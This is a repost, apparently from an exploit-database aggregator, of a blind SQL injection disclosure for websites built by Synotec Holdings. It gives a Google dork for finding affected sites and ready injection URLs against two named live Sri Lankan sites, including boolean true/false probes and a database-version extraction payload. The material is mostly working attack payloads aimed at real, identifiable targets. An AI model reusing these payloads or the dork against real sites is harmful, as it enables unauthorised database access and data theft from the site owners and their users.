Synotec Holdings - Blind Sql Injection Vulnerability
Synotec Holdings网站存在盲SQL注入漏洞,攻击者可通过修改URL参数(如添加`and true`或`and false`)进行测试。该漏洞影响多个站点,包括samara.lk和hotelengineers.lk。 2025-5-9 18:27:28 Author: cxsecurity.com(查看原文) 阅读量:9 收藏

********************************************************* #Exploit Title: Synotec Holdings - Blind Sql Injection Vulnerability #Date: 2025-05-09 #Exploit Author: Behrouz Mansoori #Google Dork: "Website By : Synotec Holdings (Pvt) Ltd" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://samara.lk/view-product.php?id=36%20and%20true-- * https://samara.lk/view-product.php?id=36%20and%20false-- * https://samara.lk/view-product.php?id=36%20and%20substring(@@version,1,1)=1-- ### Demo 2: * https://hotelengineers.lk/view-member.php?id=16%20and%20true-- * https://hotelengineers.lk/view-member.php?id=16%20and%20false-- * https://hotelengineers.lk/view-member.php?id=16%20and%20substring(@@version,1,1)=1-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025050024
如有侵权请联系:admin#unsafe.sh